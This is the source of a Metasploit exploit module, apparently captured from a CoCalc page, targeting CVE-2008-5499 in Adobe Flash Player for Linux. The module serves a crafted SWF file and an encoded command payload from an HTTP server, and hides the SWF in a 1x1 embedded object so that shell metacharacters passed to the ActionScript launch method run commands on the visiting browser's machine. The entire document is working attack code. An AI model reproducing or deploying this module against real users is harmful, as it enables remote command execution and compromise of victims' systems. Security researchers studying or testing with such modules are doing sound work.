CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = GoodRanking
8

9
  include Msf::Exploit::Remote::HttpServer::HTML
10

11
  def initialize(info = {})
12
    super(update_info(info,
13
      'Name'           => 'Adobe Flash Player ActionScript Launch Command Execution Vulnerability',
14
      'Description'    => %q{
15
          This module exploits a vulnerability in Adobe Flash Player for Linux,
16
          version 10.0.12.36 and 9.0.151.0 and prior.
17
          An input validation vulnerability allows command execution when the browser
18
          loads a SWF file which contains shell metacharacters in the arguments to
19
          the ActionScript launch method.
20

21
          The victim must have Adobe AIR installed for the exploit to work. This module
22
          was tested against version 10.0.12.36 (10r12_36).
23
        },
24
      'License'        => MSF_LICENSE,
25
      'Author'         =>
26
        [
27
          '0a29406d9794e4f9b30b3c5d6702c708', # Metasploit version
28
        ],
29
      'References'     =>
30
        [
31
          ['CVE', '2008-5499'],
32
          ['OSVDB', '50796'],
33
          ['BID', '32896'],
34
          ['URL', 'http://www.adobe.com/support/security/bulletins/apsb08-24.html']
35
        ],
36
      'DefaultOptions' =>
37
        {
38
          'HTTP::compression' => 'gzip',
39
          'HTTP::chunked'     => true
40
        },
41
      'Platform'       => 'unix', # so unix cmd exec payloads are ok
42
      'Arch'           => ARCH_CMD,
43
      'Targets'        =>
44
        [
45
          [ 'Automatic', {}],
46
        ],
47
      'DisclosureDate' => '2008-12-17',
48
      'DefaultTarget'  => 0))
49

50
  end
51

52
  def exploit
53
    path = File.join( Msf::Config.data_directory, "exploits", "CVE-2008-5499.swf" )
54
    fd = File.open( path, "rb" )
55
    @swf = fd.read(fd.stat.size)
56
    fd.close
57

58
    super
59
  end
60

61
  def on_request_uri(cli, request)
62
    msg = "#{cli.peerhost.ljust(16)} #{self.shortname}"
63
    trigger = @swf
64
    trigger_file = rand_text_alpha(rand(6)+3) + ".swf"
65

66
    obj_id = rand_text_alpha(rand(6)+3)
67

68
    if request.uri.match(/\.swf/i)
69
      print_status("#{msg} Sending Exploit SWF")
70
      send_response(cli, trigger, { 'Content-Type' => 'application/x-shockwave-flash' })
71
      return
72
    end
73

74
    if request.uri.match(/\.txt/i)
75
      send_response(cli, payload.encoded, { 'Content-Type' => 'text/plain' })
76
      return
77
    end
78

79
    html =  <<-EOS
80
    <html>
81
      <head>
82
      </head>
83
      <body>
84
      <center>
85
      <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" id="#{obj_id}" width="1" height="1" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab">
86
        <param name="movie" value="#{get_resource}#{trigger_file}" />
87
        <embed src="#{get_resource}#{trigger_file}" quality="high" width="1" height="1" name="#{obj_id}" align="middle" allowNetworking="all"
88
          type="application/x-shockwave-flash"
89
          pluginspage="http://www.macromedia.com/go/getflashplayer">
90
        </embed>
91

92
      </object>
93
    </center>
94

95
    </body>
96
    </html>
97
    EOS
98

99
    print_status("#{msg} Sending HTML...")
100
    send_response(cli, html, { 'Content-Type' => 'text/html' })
101
  end
102
end
103

104